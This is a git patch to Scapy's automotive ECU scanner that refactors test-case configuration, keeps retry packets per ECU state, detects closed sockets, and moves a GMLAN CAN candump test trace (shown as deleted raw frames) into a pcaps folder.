+fd = get_temp_file() +with RawPcapWriter(fd, linktype=1) as w: + w.write(b"test") + +try: + fd = get_temp_file() + with RawPcapWriter(fd) as w: + w.write(b"test") + assert False +except ValueError: + pass + = Check tcpdump() ~ tcpdump from io import BytesIO From 652ce46befdec90f4180463010e51842da1036f8 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 18 Aug 2021 10:03:38 +0200 Subject: [PATCH 0624/1632] Split 3054 minor changes (#3309) * Add __delitem__ function for EcuState class * Improve configuration class function * Improve retry_pkt handling to support different states * Improve detection of closed sockets during a scan * Increase verbosity of a log message in StagedAutomotiveTestCases * Introduce a TestSocket class and add typing to the interface_mockup.py helper file * cleanup paths of capture files * apply feedback * apply feedback --- scapy/contrib/automotive/ecu.py | 4 + .../automotive/scanner/configuration.py | 42 +- .../contrib/automotive/scanner/enumerator.py | 35 +- scapy/contrib/automotive/scanner/executor.py | 17 +- .../automotive/scanner/staged_test_case.py | 6 +- test/contrib/automotive/ecu.uts | 21 +- test/contrib/automotive/gmlan_trace.candump | 1087 ----------------- test/contrib/automotive/interface_mockup.py | 101 +- .../automotive/scanner/configuration.uts | 27 + .../contrib/automotive/scanner/enumerator.uts | 26 +- .../automotive => pcaps}/ecu_trace.pcap.gz | Bin test/pcaps/gmlan_trace.candump.gz | Bin 0 -> 8063 bytes 12 files changed, 212 insertions(+), 1154 deletions(-) delete mode 100755 test/contrib/automotive/gmlan_trace.candump rename test/{contrib/automotive => pcaps}/ecu_trace.pcap.gz (100%) create mode 100755 test/pcaps/gmlan_trace.candump.gz diff --git a/scapy/contrib/automotive/ecu.py b/scapy/contrib/automotive/ecu.py index 2ac56ee6466..a90bd95a540 100644 --- a/scapy/contrib/automotive/ecu.py +++ b/scapy/contrib/automotive/ecu.py @@ -43,6 +43,10 @@ def __init__(self, **kwargs): v = list(v) self.__setattr__(k, v) + def __delitem__(self, key): + # type: (str) -> None + del self.__dict__[key] + def __len__(self): # type: () -> int return len(self.__dict__.keys()) diff --git a/scapy/contrib/automotive/scanner/configuration.py b/scapy/contrib/automotive/scanner/configuration.py index 4c03c6bee5c..1cf3146dfa9 100644 --- a/scapy/contrib/automotive/scanner/configuration.py +++ b/scapy/contrib/automotive/scanner/configuration.py @@ -6,7 +6,9 @@ # scapy.contrib.description = AutomotiveTestCaseExecutorConfiguration # scapy.contrib.status = library -from scapy.compat import Any, Union, List, Type, Set +import inspect + +from scapy.compat import Any, Union, List, Type, Set, cast from scapy.contrib.automotive.scanner.graph import Graph from scapy.error import log_interactive from scapy.contrib.automotive.scanner.test_case import AutomotiveTestCaseABC @@ -69,26 +71,40 @@ def _generate_test_case_config(self, test_case_cls): self.__setattr__(test_case_cls.__name__, val) def add_test_case(self, test_case): - # type: (Union[AutomotiveTestCaseABC, Type[AutomotiveTestCaseABC], StagedAutomotiveTestCase]) -> None # noqa: E501 - if isinstance(test_case, StagedAutomotiveTestCase): - self.stages.append(test_case) - for tc in test_case.test_cases: - self.staged_test_cases.append(tc) - self._generate_test_case_config(tc.__class__) - - if isinstance(test_case, AutomotiveTestCaseABC): + # type: (Union[AutomotiveTestCaseABC, Type[AutomotiveTestCaseABC], StagedAutomotiveTestCase, Type[StagedAutomotiveTestCase]]) -> None # noqa: E501 + if inspect.isclass(test_case): + test_case_class = cast(Union[Type[AutomotiveTestCaseABC], + Type[StagedAutomotiveTestCase]], + test_case) + if issubclass(test_case_class, StagedAutomotiveTestCase): + self.add_test_case(test_case_class()) # type: ignore + elif issubclass(test_case_class, AutomotiveTestCaseABC): + self.add_test_case(test_case_class()) + else: + raise TypeError( + "Provided class is not in " + "Union[Type[AutomotiveTestCaseABC], " + "Type[StagedAutomotiveTestCase]]") + + elif isinstance(test_case, AutomotiveTestCaseABC): self.test_cases.append(test_case) self._generate_test_case_config(test_case.__class__) - - if not isinstance(test_case, AutomotiveTestCaseABC): - self.test_cases.append(test_case()) - self._generate_test_case_config(test_case) + if isinstance(test_case, StagedAutomotiveTestCase): + self.stages.append(test_case) + for tc in test_case.test_cases: + self.staged_test_cases.append(tc) + self._generate_test_case_config(tc.__class__) + else: + raise TypeError( + "Provided instance or class of " + "StagedAutomotiveTestCase or AutomotiveTestCaseABC") def __init__(self, test_cases, **kwargs): # type: (Union[List[Union[AutomotiveTestCaseABC, Type[AutomotiveTestCaseABC]]], List[Type[AutomotiveTestCaseABC]]], Any) -> None # noqa: E501 self.verbose = kwargs.get("verbose", False) self.debug = kwargs.get("debug", False) self.delay_state_change = kwargs.get("delay_state_change", 0.5) + self.unittest = kwargs.pop("unittest", False) self.state_graph = Graph() self.test_cases = list() # type: List[AutomotiveTestCaseABC] self.stages = list() # type: List[StagedAutomotiveTestCase] diff --git a/scapy/contrib/automotive/scanner/enumerator.py b/scapy/contrib/automotive/scanner/enumerator.py index a71c5a424da..d90eb1461aa 100644 --- a/scapy/contrib/automotive/scanner/enumerator.py +++ b/scapy/contrib/automotive/scanner/enumerator.py @@ -54,7 +54,7 @@ def __init__(self): self.__result_packets = OrderedDict() # type: Dict[bytes, Packet] self._results = list() # type: List[_AutomotiveTestCaseScanResult] self._request_iterators = dict() # type: Dict[EcuState, Iterable[Packet]] # noqa: E501 - self._retry_pkt = None # type: Optional[Union[Packet, Iterable[Packet]]] # noqa: E501 + self._retry_pkt = defaultdict(lambda: None) # type: Dict[EcuState, Optional[Union[Packet, Iterable[Packet]]]] # noqa: E501 self._negative_response_blacklist = [0x10, 0x11] # type: List[int] @staticmethod @@ -133,17 +133,16 @@ def _store_result(self, state, req, res): req.sent_time or 0.0, res.time if res is not None else None)) - def __get_retry_iterator(self): - # type: () -> Iterable[Packet] - if self._retry_pkt: - if isinstance(self._retry_pkt, Packet): - it = [self._retry_pkt] # type: Iterable[Packet] - else: - # assume self.retry_pkt is a generator or list - it = self._retry_pkt - return it - else: + def __get_retry_iterator(self, state): + # type: (EcuState) -> Iterable[Packet] + retry_entry = self._retry_pkt[state] + if retry_entry is None: return [] + elif isinstance(retry_entry, Packet): + return [retry_entry] + else: + # assume self.retry_pkt is a generator or list + return retry_entry def __get_initial_request_iterator(self, state, **kwargs): # type: (EcuState, Any) -> Iterable[Packet] @@ -155,7 +154,7 @@ def __get_initial_request_iterator(self, state, **kwargs): def __get_request_iterator(self, state, **kwargs): # type: (EcuState, Optional[Dict[str, Any]]) -> Iterable[Packet] - return chain(self.__get_retry_iterator(), + return chain(self.__get_retry_iterator(state), self.__get_initial_request_iterator(state, **kwargs)) def execute(self, socket, state, **kwargs): @@ -175,10 +174,10 @@ def execute(self, socket, state, **kwargs): try: res = socket.sr1(req, timeout=timeout, verbose=False) except (OSError, ValueError, Scapy_Exception) as e: - if self._retry_pkt is None: + if self._retry_pkt[state] is None: log_interactive.debug( "[-] Exception '%s' in execute. Prepare for retry", e) - self._retry_pkt = req + self._retry_pkt[state] = req else: log_interactive.critical( "[-] Exception during retry. This is bad") @@ -244,19 +243,19 @@ def _evaluate_response(self, if retry_if_busy_returncode and response.service == 0x7f \ and self._get_negative_response_code(response) == 0x21: - if self._retry_pkt is None: + if self._retry_pkt[state] is None: # This was no retry since the retry_pkt is None - self._retry_pkt = request + self._retry_pkt[state] = request log_interactive.debug( "[-] Exit execute. Retry packet next time!") return True else: # This was a unsuccessful retry, continue execute - self._retry_pkt = None + self._retry_pkt[state] = None log_interactive.debug("[-] Unsuccessful retry!") return False else: - self._retry_pkt = None + self._retry_pkt[state] = None if EcuState.is_modifier_pkt(response): if state != EcuState.get_modified_ecu_state( diff --git a/scapy/contrib/automotive/scanner/executor.py b/scapy/contrib/automotive/scanner/executor.py index b6dda8f6e45..c94c955e6eb 100644 --- a/scapy/contrib/automotive/scanner/executor.py +++ b/scapy/contrib/automotive/scanner/executor.py @@ -12,9 +12,10 @@ from itertools import product from scapy.compat import Any, Union, List, Optional, \ - Dict, Callable, Type + Dict, Callable, Type, cast from scapy.contrib.automotive.scanner.graph import Graph from scapy.error import Scapy_Exception, log_interactive +from scapy.supersocket import SuperSocket from scapy.utils import make_lined_table, SingleConversationSocket import scapy.modules.six as six from scapy.contrib.automotive.ecu import EcuState, EcuResponse, Ecu @@ -145,6 +146,10 @@ def reconnect(self): else: self.socket = socket + if self.socket.closed: + raise Scapy_Exception( + "Socket closed even after reconnect. Stop scan!") + def execute_test_case(self, test_case): # type: (AutomotiveTestCaseABC) -> None """ @@ -222,6 +227,11 @@ def scan(self, timeout=None): log_interactive.critical("[-] Exception: %s", e) if self.configuration.debug: raise e + if cast(SuperSocket, self.socket).closed and \ + self.reconnect_handler is None: + log_interactive.critical( + "Socket went down. Need to leave scan") + raise e finally: self.cleanup_state() @@ -244,12 +254,13 @@ def enter_state_path(self, path): if path[0] != self.__initial_ecu_state: raise Scapy_Exception( "Initial state of path not equal reset state of the target") - if len(path) == 1: - return True self.reset_target() self.reconnect() + if len(path) == 1: + return True + for next_state in path[1:]: edge = (self.target_state, next_state) if not self.enter_state(*edge): diff --git a/scapy/contrib/automotive/scanner/staged_test_case.py b/scapy/contrib/automotive/scanner/staged_test_case.py index 6733285e3c1..6c8d547f3f7 100644 --- a/scapy/contrib/automotive/scanner/staged_test_case.py +++ b/scapy/contrib/automotive/scanner/staged_test_case.py @@ -195,9 +195,9 @@ def pre_execute(self, if self.__current_kwargs is not None and con_kwargs is not None: # noqa: E501 self.__current_kwargs.update(con_kwargs) - log_interactive.debug("[i] Stage AutomotiveTestCase %s kwargs: %s", - self.current_test_case.__class__.__name__, - self.__current_kwargs) + log_interactive.debug("[i] Stage AutomotiveTestCase %s kwargs: %s", + self.current_test_case.__class__.__name__, + self.__current_kwargs) self.current_test_case.pre_execute(socket, state, global_configuration) diff --git a/test/contrib/automotive/ecu.uts b/test/contrib/automotive/ecu.uts index 3e47f2b15b3..1319f619a76 100644 --- a/test/contrib/automotive/ecu.uts +++ b/test/contrib/automotive/ecu.uts @@ -60,7 +60,20 @@ assert 5 == state.ses assert "42" == state.myinfo assert repr(state) == "myinfo42ses5" += Delete Attribute Test +state = EcuState(myinfo="42") + +state.ses = 5 +assert state.ses == 5 + +del state.ses + +try: + x = state.ses + assert False +except (KeyError, AttributeError): + assert state.myinfo == "42" = Copy tests @@ -483,7 +496,7 @@ assert unanswered_packets[0].diagnosticSessionType == 4 = Analyze multiple UDS messages -with PcapReader("test/contrib/automotive/ecu_trace.pcap.gz") as sock: +with PcapReader(scapy_path("test/pcaps/ecu_trace.pcap.gz")) as sock: udsmsgs = sniff(session=ISOTPSession, session_kwargs={"use_ext_addr":False, "basecls":UDS}, count=50, opened_socket=sock, timeout=3) assert len(udsmsgs) == 50 @@ -513,7 +526,7 @@ assert len(ecu.log["TransferData"]) == 2 session = EcuSession() -with PcapReader("test/contrib/automotive/ecu_trace.pcap.gz") as sock: +with PcapReader(scapy_path("test/pcaps/ecu_trace.pcap.gz")) as sock: udsmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "use_ext_addr":False, "basecls":UDS}, count=50, opened_socket=sock, timeout=3) assert len(udsmsgs) == 50 @@ -541,7 +554,7 @@ assert len(ecu.log["TransferData"]) == 2 session = EcuSession() -with CandumpReader("test/contrib/automotive/gmlan_trace.candump") as sock: +with CandumpReader(scapy_path("test/pcaps/gmlan_trace.candump.gz")) as sock: gmlanmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "did":[0x241, 0x641, 0x101], "basecls":GMLAN}, count=2, opened_socket=sock, timeout=3) ecu = session.ecu print("Check 1 after change to diagnostic mode") @@ -575,7 +588,7 @@ session = EcuSession(verbose=False, store_supported_responses=False) conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 -with CandumpReader("test/contrib/automotive/gmlan_trace.candump") as sock: +with CandumpReader(scapy_path("test/pcaps/gmlan_trace.candump.gz")) as sock: gmlanmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "did":[0x241, 0x641, 0x101], "basecls":GMLAN}, count=200, opened_socket=sock, timeout=6) ecu = session.ecu diff --git a/test/contrib/automotive/gmlan_trace.candump b/test/contrib/automotive/gmlan_trace.candump deleted file mode 100755 index 04d88c6aabe..00000000000 --- a/test/contrib/automotive/gmlan_trace.candump +++ /dev/null @@ -1,1087 +0,0 @@ -(0.297000) vcan2 12A#122010FF00001080 -(2.713000) vcan2 1E1#00000400000000 -(7.647000) vcan2 0F1#B10000400000 -(10.240000) vcan2 135#0400000200000000 -(12.778000) vcan2 1F3#000000 -(15.153000) vcan2 451#000000000000 -(17.670000) vcan2 0F1#8D0000400000 -(20.251000) vcan2 137#0000000030000000 -(22.741000) vcan2 3F1#00FF5F0C00FF0100 -(27.657000) vcan2 0F1#990000400000 -(30.210000) vcan2 139#0000000000000000 -(32.718000) vcan2 1E1#000004000104F0 -(35.159000) vcan2 451#000000000000 -(37.676000) vcan2 0F1#A50000400000 -(40.144000) vcan2 1F3#404000 -(42.773000) vcan2 32A#0000000000000000 -(50.172000) vcan2 0F1#B10000400000 -(52.666000) vcan2 451#000000000000 -(57.674000) vcan2 0F1#8D0000400000 -(60.231000) vcan2 1E1#000004000208E0 -(67.675000) vcan2 0F1#990000400000 -(70.316000) vcan2 1F1#050A000008000070 -(72.627000) vcan2 1F3#808000 -(75.172000) vcan2 451#000000000000 -(77.694000) vcan2 0F1#A50000400000 -(80.201000) vcan2 3C9#0766000000000000 -(87.680000) vcan2 0F1#B10000400000 -(90.180000) vcan2 160#1C2A2E8703 -(92.751000) vcan2 1E1#00000400030CD0 -(95.236000) vcan2 451#000000000000 -(97.704000) vcan2 0F1#8D0000400000 -(100.345000) vcan2 12A#122010FF00001090 -(102.640000) vcan2 1F3#C0C000 -(107.691000) vcan2 0F1#990000400000 -(110.282000) vcan2 135#0400000200000000 -(112.861000) vcan2 451#000000000000 -(117.698000) vcan2 0F1#A50000400000 -(120.295000) vcan2 137#0000000030000000 -(122.762000) vcan2 1E1#00000400000000 -(127.700000) vcan2 0F1#B10000400000 -(130.256000) vcan2 139#0000000000000000 -(132.649000) vcan2 1F3#000000 -(135.202000) vcan2 451#000000000000 -(137.724000) vcan2 0F1#8D0000400000 -(140.325000) vcan2 32A#0000000000000000 -(147.710000) vcan2 0F1#990000400000 -(150.282000) vcan2 1E1#000004000104F0 -(152.717000) vcan2 451#000000000000 -(157.713000) vcan2 0F1#A50000400000 -(160.167000) vcan2 1F3#404000 -(167.718000) vcan2 0F1#B10000400000 -(170.359000) vcan2 1F1#050A000008000070 -(172.715000) vcan2 451#000000000000 -(177.723000) vcan2 0F1#8D0000400000 -(180.284000) vcan2 1E1#000004000208E0 -(182.747000) vcan2 3C9#0766000000000000 -(187.724000) vcan2 0F1#990000400000 -(190.227000) vcan2 160#1C2A2E8703 -(192.710000) vcan2 1F3#808000 -(195.262000) vcan2 451#000000000000 -(197.745000) vcan2 0F1#A50000400000 -(200.434000) vcan2 12A#122010FF000010A0 -(207.736000) vcan2 0F1#B10000400000 -(210.325000) vcan2 135#0400000200000000 -(212.973000) vcan2 1E1#00000400030CD0 -(215.240000) vcan2 451#000000000000 -(217.757000) vcan2 0F1#8D0000400000 -(220.337000) vcan2 137#0000000030000000 -(222.688000) vcan2 1F3#C0C000 -(227.744000) vcan2 0F1#990000400000 -(230.299000) vcan2 139#0000000000000000 -(232.737000) vcan2 451#000000000000 -(237.749000) vcan2 0F1#A50000400000 -(240.366000) vcan2 1E1#00000400000000 -(242.874000) vcan2 32A#0000000000000000 -(247.752000) vcan2 0F1#B10000400000 -(250.253000) vcan2 1F3#000000 -(252.755000) vcan2 451#000000000000 -(257.761000) vcan2 0F1#8D0000400000 -(267.758000) vcan2 0F1#990000400000 -(270.235000) vcan2 120#000160F100 -(272.822000) vcan2 1E1#000004000104F0 -(275.403000) vcan2 1F1#050A000008000070 -(277.777000) vcan2 0F1#A50000400000 -(280.218000) vcan2 1F3#404000 -(282.789000) vcan2 3C9#0766000000000000 -(285.355000) vcan2 3F1#00FF5F0C00FF0100 -(287.784000) vcan2 0F1#B10000400000 -(290.287000) vcan2 140#000A00 -(292.793000) vcan2 160#1C2A2E8703 -(295.316000) vcan2 451#000000000000 -(297.791000) vcan2 0F1#8D0000400000 -(300.442000) vcan2 12A#122010FF000010B0 -(302.836000) vcan2 1E1#000004000208E0 -(305.271000) vcan2 4C5#0000000000 -(307.792000) vcan2 0F1#990000400000 -(310.368000) vcan2 135#0400000200000000 -(312.911000) vcan2 1F3#808000 -(315.282000) vcan2 451#000000000000 -(317.798000) vcan2 0F1#A50000400000 -(320.381000) vcan2 137#0000000030000000 -(322.782000) vcan2 4E1#4843373933343934 -(325.284000) vcan2 4E9#112000000300 -(327.801000) vcan2 0F1#B10000400000 -(330.342000) vcan2 139#0000000000000000 -(332.845000) vcan2 1E1#00000400030CD0 -(335.287000) vcan2 451#000000000000 -(337.810000) vcan2 0F1#8D0000400000 -(340.313000) vcan2 1F3#C0C000 -(342.881000) vcan2 32A#0000000000000000 -(345.348000) vcan2 514#304C444436453733 -(347.809000) vcan2 0F1#990000400000 -(350.319000) vcan2 451#000000000000 -(352.862000) vcan2 52A#000037373737 -(355.297000) vcan2 530#00000000 -(357.810000) vcan2 0F1#A50000400000 -(360.368000) vcan2 1E1#00000400000000 -(367.801000) vcan2 0F1#B10000400000 -(370.447000) vcan2 1F1#050A000008000070 -(372.756000) vcan2 1F3#000000 -(375.307000) vcan2 451#000000000000 -(377.826000) vcan2 0F1#8D0000400000 -(380.325000) vcan2 3C9#0766000000000000 -(387.813000) vcan2 0F1#990000400000 -(390.330000) vcan2 160#1C2A2E8703 -(392.923000) vcan2 1E1#000004000104F0 -(395.407000) vcan2 451#000000000000 -(397.832000) vcan2 0F1#A50000400000 -(400.473000) vcan2 12A#122010FF00001080 -(402.769000) vcan2 1F3#404000 -(407.821000) vcan2 0F1#B10000400000 -(410.410000) vcan2 135#0400000200000000 -(412.991000) vcan2 451#000000000000 -(417.830000) vcan2 0F1#8D0000400000 -(420.423000) vcan2 137#0000000030000000 -(422.886000) vcan2 1E1#000004000208E0 -(427.831000) vcan2 0F1#990000400000 -(430.386000) vcan2 139#0000000000000000 -(432.781000) vcan2 1F3#808000 -(435.329000) vcan2 451#000000000000 -(437.848000) vcan2 0F1#A50000400000 -(440.451000) vcan2 32A#0000000000000000 -(447.837000) vcan2 0F1#B10000400000 -(450.406000) vcan2 1E1#00000400030CD0 -(452.861000) vcan2 451#000000000000 -(457.844000) vcan2 0F1#8D0000400000 -(460.297000) vcan2 1F3#C0C000 -(467.846000) vcan2 0F1#990000400000 -(470.486000) vcan2 1F1#050A000008000070 -(472.845000) vcan2 451#000000000000 -(477.851000) vcan2 0F1#A50000400000 -(480.421000) vcan2 1E1#00000400000000 -(482.876000) vcan2 3C9#0766000000000000 -(487.856000) vcan2 0F1#B10000400000 -(490.356000) vcan2 160#1C2A2E8703 -(492.839000) vcan2 1F3#000000 -(495.388000) vcan2 451#000000000000 -(497.878000) vcan2 0F1#8D0000400000 -(500.557000) vcan2 12A#122010FF00001090 -(507.864000) vcan2 0F1#990000400000 -(510.454000) vcan2 135#0400000200000000 -(513.101000) vcan2 1E1#000004000104F0 -(515.366000) vcan2 451#000000000000 -(517.884000) vcan2 0F1#A50000400000 -(520.467000) vcan2 137#0000000030000000 -(522.820000) vcan2 1F3#404000 -(525.461000) vcan2 3F1#00FF5F0C00FF0100 -(527.887000) vcan2 0F1#B10000400000 -(530.428000) vcan2 139#0000000000000000 -(532.871000) vcan2 451#000000000000 -(537.880000) vcan2 0F1#8D0000400000 -(540.487000) vcan2 1E1#000004000208E0 -(542.986000) vcan2 32A#0000000000000000 -(547.879000) vcan2 0F1#990000400000 -(550.352000) vcan2 1F3#808000 -(552.889000) vcan2 451#000000000000 -(557.886000) vcan2 0F1#A50000400000 -(567.890000) vcan2 0F1#B10000400000 -(570.451000) vcan2 1E1#00000400030CD0 -(573.035000) vcan2 1F1#050A000008000070 -(575.390000) vcan2 451#000000000000 -(577.913000) vcan2 0F1#8D0000400000 -(580.346000) vcan2 1F3#C0C000 -(582.916000) vcan2 3C9#0766000000000000 -(587.900000) vcan2 0F1#990000400000 -(590.399000) vcan2 160#1C2A2E8703 -(592.903000) vcan2 451#000000000000 -(597.905000) vcan2 0F1#A50000400000 -(600.546000) vcan2 12A#122010FF000010A0 -(602.971000) vcan2 1E1#00000400000000 -(607.908000) vcan2 0F1#B10000400000 -(610.497000) vcan2 135#0400000200000000 -(613.037000) vcan2 1F3#000000 -(615.408000) vcan2 451#000000000000 -(617.929000) vcan2 0F1#8D0000400000 -(620.510000) vcan2 137#0000000030000000 -(627.914000) vcan2 0F1#990000400000 -(630.471000) vcan2 139#0000000000000000 -(632.976000) vcan2 1E1#000004000104F0 -(635.419000) vcan2 451#000000000000 -(637.933000) vcan2 0F1#A50000400000 -(640.442000) vcan2 1F3#404000 -(642.993000) vcan2 32A#0000000000000000 -(647.924000) vcan2 0F1#B10000400000 -(650.479000) vcan2 451#000000000000 -(657.935000) vcan2 0F1#8D0000400000 -(660.492000) vcan2 1E1#000004000208E0 -(667.933000) vcan2 0F1#990000400000 -(670.572000) vcan2 1F1#050A000008000070 -(672.882000) vcan2 1F3#808000 -(675.435000) vcan2 451#000000000000 -(677.952000) vcan2 0F1#A50000400000 -(680.456000) vcan2 3C9#0766000000000000 -(687.845000) vcan2 0F1#B10000400000 -(690.354000) vcan2 160#1C2A2E8703 -(692.944000) vcan2 1E1#00000400030CD0 -(695.431000) vcan2 451#000000000000 -(697.866000) vcan2 0F1#8D0000400000 -(700.508000) vcan2 12A#122010FF000010B0 -(702.801000) vcan2 1F3#C0C000 -(707.853000) vcan2 0F1#990000400000 -(710.442000) vcan2 135#0400000200000000 -(713.024000) vcan2 451#000000000000 -(717.854000) vcan2 0F1#A50000400000 -(720.455000) vcan2 137#0000000030000000 -(722.925000) vcan2 1E1#00000400000000 -(727.859000) vcan2 0F1#B10000400000 -(730.416000) vcan2 139#0000000000000000 -(732.814000) vcan2 1F3#000000 -(735.363000) vcan2 451#000000000000 -(737.884000) vcan2 0F1#8D0000400000 -(740.472000) vcan2 32A#0000000000000000 -(747.871000) vcan2 0F1#990000400000 -(750.462000) vcan2 1E1#000004000104F0 -(752.896000) vcan2 451#000000000000 -(757.874000) vcan2 0F1#A50000400000 -(760.325000) vcan2 1F3#404000 -(767.881000) vcan2 0F1#B10000400000 -(770.516000) vcan2 1F1#050A000008000070 -(772.967000) vcan2 3F1#00FF5F0C00FF0100 -(775.376000) vcan2 451#000000000000 -(777.902000) vcan2 0F1#8D0000400000 -(780.445000) vcan2 1E1#000004000208E0 -(782.904000) vcan2 3C9#0766000000000000 -(785.374000) vcan2 4C5#0000000000 -(787.901000) vcan2 0F1#990000400000 -(790.398000) vcan2 160#1C2A2E8703 -(792.864000) vcan2 1F3#808000 -(795.413000) vcan2 451#000000000000 -(797.906000) vcan2 0F1#A50000400000 -(800.582000) vcan2 12A#122010FF00001080 -(807.893000) vcan2 0F1#B10000400000 -(810.486000) vcan2 135#0400000200000000 -(813.130000) vcan2 1E1#00000400030CD0 -(815.401000) vcan2 451#000000000000 -(817.916000) vcan2 0F1#8D0000400000 -(820.501000) vcan2 137#0000000030000000 -(822.852000) vcan2 1F3#C0C000 -(827.903000) vcan2 0F1#990000400000 -(830.456000) vcan2 139#0000000000000000 -(832.901000) vcan2 451#000000000000 -(837.910000) vcan2 0F1#A50000400000 -(840.521000) vcan2 1E1#00000400000000 -(843.016000) vcan2 32A#0000000000000000 -(847.913000) vcan2 0F1#B10000400000 -(850.386000) vcan2 1F3#000000 -(852.913000) vcan2 451#000000000000 -(857.922000) vcan2 0F1#8D0000400000 -(867.922000) vcan2 0F1#990000400000 -(870.484000) vcan2 1E1#000004000104F0 -(873.063000) vcan2 1F1#050A000008000070 -(875.416000) vcan2 451#000000000000 -(877.939000) vcan2 0F1#A50000400000 -(880.379000) vcan2 1F3#404000 -(882.948000) vcan2 3C9#0766000000000000 -(887.930000) vcan2 0F1#B10000400000 -(890.404000) vcan2 160#1C2A2E8703 -(893.001000) vcan2 451#000000000000 -(897.935000) vcan2 0F1#8D0000400000 -(900.573000) vcan2 12A#122010FF00001090 -(902.998000) vcan2 1E1#000004000208E0 -(907.936000) vcan2 0F1#990000400000 -(910.530000) vcan2 135#0400000200000000 -(913.067000) vcan2 1F3#808000 -(915.442000) vcan2 451#000000000000 -(917.958000) vcan2 0F1#A50000400000 -(920.541000) vcan2 137#0000000030000000 -(927.948000) vcan2 0F1#B10000400000 -(930.500000) vcan2 139#0000000000000000 -(933.007000) vcan2 1E1#00000400030CD0 -(935.450000) vcan2 451#000000000000 -(937.969000) vcan2 0F1#8D0000400000 -(940.467000) vcan2 1F3#C0C000 -(943.036000) vcan2 32A#0000000000000000 -(947.956000) vcan2 0F1#990000400000 -(950.546000) vcan2 451#000000000000 -(957.961000) vcan2 0F1#A50000400000 -(960.529000) vcan2 1E1#00000400000000 -(967.966000) vcan2 0F1#B10000400000 -(970.607000) vcan2 1F1#050A000008000070 -(972.916000) vcan2 1F3#000000 -(975.464000) vcan2 451#000000000000 -(977.987000) vcan2 0F1#8D0000400000 -(980.490000) vcan2 3C9#0766000000000000 -(987.970000) vcan2 0F1#990000400000 -(990.471000) vcan2 160#1C2A2E8703 -(993.044000) vcan2 1E1#000004000104F0 -(995.528000) vcan2 451#000000000000 -(997.991000) vcan2 0F1#A50000400000 -(1000.634000) vcan2 12A#122010FF000010A0 -(1002.932000) vcan2 1F3#404000 -(1007.982000) vcan2 0F1#B10000400000 -(1010.571000) vcan2 135#0400000200000000 -(1013.153000) vcan2 451#000000000000 -(1017.991000) vcan2 0F1#8D0000400000 -(1020.584000) vcan2 137#0000000030000000 -(1023.048000) vcan2 1E1#000004000208E0 -(1025.579000) vcan2 3F1#00FF5F0C00FF0100 -(1028.004000) vcan2 0F1#990000400000 -(1030.546000) vcan2 139#0000000000000000 -(1032.939000) vcan2 1F3#808000 -(1035.492000) vcan2 451#000000000000 -(1038.009000) vcan2 0F1#A50000400000 -(1040.601000) vcan2 32A#0000000000000000 -(1048.000000) vcan2 0F1#B10000400000 -(1050.563000) vcan2 1E1#00000400030CD0 -(1052.999000) vcan2 451#000000000000 -(1058.007000) vcan2 0F1#8D0000400000 -(1060.456000) vcan2 1F3#C0C000 -(1068.008000) vcan2 0F1#990000400000 -(1070.651000) vcan2 1F1#050A000008000070 -(1073.006000) vcan2 451#000000000000 -(1078.009000) vcan2 0F1#A50000400000 -(1080.580000) vcan2 1E1#00000400000000 -(1083.037000) vcan2 3C9#0766000000000000 -(1088.014000) vcan2 0F1#B10000400000 -(1090.523000) vcan2 160#1C2A2E8703 -(1093.010000) vcan2 1F3#000000 -(1095.576000) vcan2 451#000000000000 -(1098.039000) vcan2 0F1#8D0000400000 -(1100.702000) vcan2 12A#122010FF000010B0 -(1108.026000) vcan2 0F1#990000400000 -(1110.615000) vcan2 135#0400000200000000 -(1113.264000) vcan2 1E1#000004000104F0 -(1115.529000) vcan2 451#000000000000 -(1118.043000) vcan2 0F1#A50000400000 -(1120.628000) vcan2 137#0000000030000000 -(1122.977000) vcan2 1F3#404000 -(1128.035000) vcan2 0F1#B10000400000 -(1130.591000) vcan2 139#0000000000000000 -(1133.028000) vcan2 451#000000000000 -(1138.044000) vcan2 0F1#8D0000400000 -(1140.656000) vcan2 1E1#000004000208E0 -(1143.099000) vcan2 32A#0000000000000000 -(1148.043000) vcan2 0F1#990000400000 -(1150.579000) vcan2 1F3#808000 -(1153.058000) vcan2 451#000000000000 -(1158.048000) vcan2 0F1#A50000400000 -(1168.049000) vcan2 0F1#B10000400000 -(1170.612000) vcan2 1E1#00000400030CD0 -(1173.197000) vcan2 1F1#050A000008000070 -(1175.551000) vcan2 451#000000000000 -(1178.072000) vcan2 0F1#8D0000400000 -(1180.509000) vcan2 1F3#C0C000 -(1183.081000) vcan2 3C9#0766000000000000 -(1188.059000) vcan2 0F1#990000400000 -(1190.562000) vcan2 160#1C2A2E8703 -(1193.088000) vcan2 451#000000000000 -(1198.064000) vcan2 0F1#A50000400000 -(1200.723000) vcan2 12A#122010FF00001080 -(1203.132000) vcan2 1E1#00000400000000 -(1208.069000) vcan2 0F1#B10000400000 -(1210.658000) vcan2 135#0400000200000000 -(1213.199000) vcan2 1F3#000000 -(1215.573000) vcan2 451#000000000000 -(1218.092000) vcan2 0F1#8D0000400000 -(1220.671000) vcan2 137#0000000030000000 -(1228.079000) vcan2 0F1#990000400000 -(1230.632000) vcan2 139#0000000000000000 -(1233.137000) vcan2 1E1#000004000104F0 -(1235.577000) vcan2 451#000000000000 -(1238.096000) vcan2 0F1#A50000400000 -(1240.595000) vcan2 1F3#404000 -(1243.173000) vcan2 32A#0000000000000000 -(1248.087000) vcan2 0F1#B10000400000 -(1250.626000) vcan2 451#000000000000 -(1258.092000) vcan2 0F1#8D0000400000 -(1260.653000) vcan2 1E1#000004000208E0 -(1268.092000) vcan2 0F1#990000400000 -(1270.736000) vcan2 1F1#050A000008000070 -(1273.047000) vcan2 1F3#808000 -(1275.686000) vcan2 3F1#00FF5F0C00FF0100 -(1278.113000) vcan2 0F1#A50000400000 -(1280.617000) vcan2 3C9#0766000000000000 -(1283.096000) vcan2 451#000000000000 -(1285.591000) vcan2 4C5#0000000000 -(1288.117000) vcan2 0F1#B10000400000 -(1290.646000) vcan2 140#000A00 -(1293.077000) vcan2 160#1C2A2E8703 -(1295.739000) vcan2 1E1#00000400030CD0 -(1298.130000) vcan2 0F1#8D0000400000 -(1300.817000) vcan2 12A#122010FF00001090 -(1303.058000) vcan2 1F3#C0C000 -(1305.610000) vcan2 451#000000000000 -(1308.127000) vcan2 0F1#990000400000 -(1310.700000) vcan2 135#0400000200000000 -(1313.286000) vcan2 4E9#112000000300 